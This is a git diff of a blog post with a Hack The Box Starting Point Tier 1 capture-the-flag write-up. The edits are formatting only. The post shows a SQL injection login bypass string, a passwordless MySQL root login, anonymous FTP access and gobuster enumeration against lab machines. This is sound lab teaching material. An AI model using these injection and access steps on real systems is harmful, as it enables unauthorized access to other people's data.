--- a/_posts/ctf/htb/starting-point/2022-02-27-tier1.md
+++ b/_posts/ctf/htb/starting-point/2022-02-27-tier1.md
@@ -4,30 +4,32 @@ title: 'HTB | Tier 1'
 permalink: /htb/starting-point/tier-1/
 ---
 
-# [](#header-4)Appointment
-## [](#header-4)Connection
+# Appointment
+## Connection
 We can search the IP in the navbar to get a website.
 ![login](../../../img/htb/starting-point/Screenshot_1.jpg)
 
 We will try a basic sql-injection, login with the user:
-{% highlight plain %}
+{% highlight bash %}
 ' or '1'='1' #
 {% endhighlight %}
 For the password we just need to write a letter.
 
-## [](#header-4)Flag
+## Flag
 The flag will be in front of us.
 
-# [](#header-4)Sequel
-## [](#header-4)Connection
+---
+
+# Sequel
+## Connection
 We will use mysql to connect, with the **root** user.
-{% highlight plain %}
+{% highlight bash %}
 > mysql -u root -h 10.129.220.35
 {% endhighlight %}
 
-## [](#header-4)Flag
+## Flag
 Now we are in, we just need to list all the databases and search for the flag.
-{% highlight plain %}
+{% highlight mysql %}
 MariaDB [(none)]> show databases;
 +--------------------+
 | Database           |
@@ -50,19 +52,20 @@ MariaDB [htb]> show tables;
 MariaDB [htb]> select * from config;
 {% endhighlight %}
 
-# [](#header-4)Crocodile
-## [](#header-4)Connection
+---
+
+# Crocodile
+## Connection
 We will connect with ftp and the user **anonymous**. There we can download two files, with users and passwords.
-{% highlight plain %}
-$ ftp 10.129.122.93
+{% highlight bash %}
+> ftp 10.129.122.93
 {% endhighlight %}
 With **gobuster** we can check for others files in the webpage, and we can see a **login.php**:
-{% highlight plain %}
-$ gobuster dir -u http://10.129.122.93/ -w /usr/share/wordlists/directory-list-2.3-small.txt -x php
+{% highlight bash %}
+>  gobuster dir -u http://10.129.122.93/ -w /usr/share/wordlists/directory-list-2.3-small.txt -x php
 {% endhighlight %}
 
-
-## [](#header-4)Flag
+## Flag
 We will have now this page:
 <img src="https://raw.githubusercontent.com/zeropio/zeropio.github.io/main/_posts/htb/starting-point/img/Screenshot_2.jpg" weight="100%" />
 With the **admin** login we can enter and get our flag.
